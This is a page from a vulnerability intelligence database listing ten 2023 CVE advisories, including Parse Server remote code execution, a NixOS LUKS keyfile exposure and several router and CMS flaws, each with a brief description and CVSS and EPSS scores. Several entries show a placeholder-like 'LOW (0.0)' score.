Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited

CVE-2023-36612
Description: Directory traversal can occur in the Basecamp com.basecamp.bc3 application before 4.2.1 for Android, which may allow an attacker to write arbitrary files in the application's private directory. Additionally, by using a malicious intent, the attacker may redirect the server's responses (containing sensitive information) to third-party applications by using a custom-crafted deeplink scheme.

CVSS: LOW (0.0)

EPSS Score: 0.06%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36476
`calamares-nixos-extensions` LUKS keyfile exposure
Description: calamares-nixos-extensions provides Calamares branding and modules for NixOS, a distribution of GNU/Linux. Users of calamares-nixos-extensions version 0.3.12 and prior who installed NixOS through the graphical calamares installer, with an unencrypted `/boot`, on either non-UEFI systems or with a LUKS partition different from `/` have their LUKS key file in `/boot` as a plaintext CPIO archive attached to their NixOS initrd. A patch is available and anticipated to be part of version 0.3.13 to backport to NixOS 22.11, 23.05, and unstable channels. Expert users who have a copy of their data may, as a workaround, re-encrypt the LUKS partition(s) themselves.

CVSS: HIGH (7.9)

EPSS Score: 0.09%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36475
Parse Server vulnerable to remote code execution via MongoDB BSON parser through prototype pollution
Description: Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 5.5.2 and 6.2.1, an attacker can use a prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. A patch is available in versions 5.5.2 and 6.2.1.

CVSS: CRITICAL (9.8)

EPSS Score: 14.4%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36377
Description: Buffer Overflow vulnerability in mtrojnar osslsigncode v.2.3 and before allows a local attacker to execute arbitrary code via a crafted .exe, .sys, and .dll files.

CVSS: LOW (0.0)

EPSS Score: 0.04%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36347
Description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.

CVSS: LOW (0.0)

EPSS Score: 6.43%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36291
Description: Cross Site Scripting vulnerability in Maxsite CMS v.108.7 allows a remote attacker to execute arbitrary code via the f_content parameter in the admin/page_new file.

CVSS: LOW (0.0)

EPSS Score: 0.08%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36146
Description: A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733.

CVSS: LOW (0.0)

EPSS Score: 0.07%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36144
Description: An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.

CVSS: LOW (0.0)

EPSS Score: 6.89%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-36143
Description: Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.

CVSS: LOW (0.0)

EPSS Score: 0.24%

Source: CVE
November 28th, 2024 (6 months ago)

CVE-2023-35932
jcvi vulnerable to Configuration Injection due to unsanitized user input
Description: jcvi is a Python library to facilitate genome assembly, annotation, and comparative genomics. A configuration injection happens when user input is considered by the application in an unsanitized format and can reach the configuration file. A malicious user may craft a special payload that may lead to a command injection. The impact of a configuration injection may vary. Under some conditions, it may lead to command injection if there is for instance shell code execution from the configuration file values. This vulnerability does not currently have a fix.

CVSS: HIGH (7.1)

EPSS Score: 0.14%

Source: CVE
November 28th, 2024 (6 months ago)